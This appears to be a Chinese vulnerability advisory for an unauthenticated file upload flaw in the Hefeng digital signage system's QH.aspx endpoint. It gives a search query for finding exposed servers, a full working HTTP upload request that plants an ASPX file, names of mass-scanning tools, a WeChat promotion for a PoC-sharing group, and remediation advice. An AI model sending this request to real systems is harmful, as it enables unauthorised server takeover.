0x01 产品简介
和丰多媒体信息发布系统也称数字标牌(Digital Signage),是指通过大屏幕终端显示设备,发布商业、财经和娱乐信息的多媒体专业视听系统,常被称为除纸张媒体、电台、电视、互联网之外的“第五媒体”。该系统基于Web的全B/S先进架构,支持大用户数、大并发数及权限管理,可以同时连接数千、上万个播放终端。
0x02 漏洞概述
和丰多媒体信息发布系统 QH.aspx 接口存在文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传任意后门文件,执行恶意指令,从而获取服务器权限。
0x03 搜索引擎
app="和丰山海-数字标牌"
0x04 漏洞复现
POST /QH.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhbcZX7o0Hw19h3kr
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="fileToUpload"; filename="qwe.aspx"
Content-Type: application/octet-stream
<%@Page Language="C#"%><%Response.Write("pboyjnnrfipmplsukdeczudsefxmywe");System.IO.File.Delete(Request.PhysicalPath);%>
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="action"
upload
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="responderId"
ResourceNewResponder
------WebKitFormBoundaryhbcZX7o0Hw19h3kr
Content-Disposition: form-data; name="remotePath"
/opt/resources
------WebKitFormBoundaryhbcZX7o0Hw19h3kr--
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
请使用VX扫一扫加入内部POC
脚本分享圈子
0x06 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本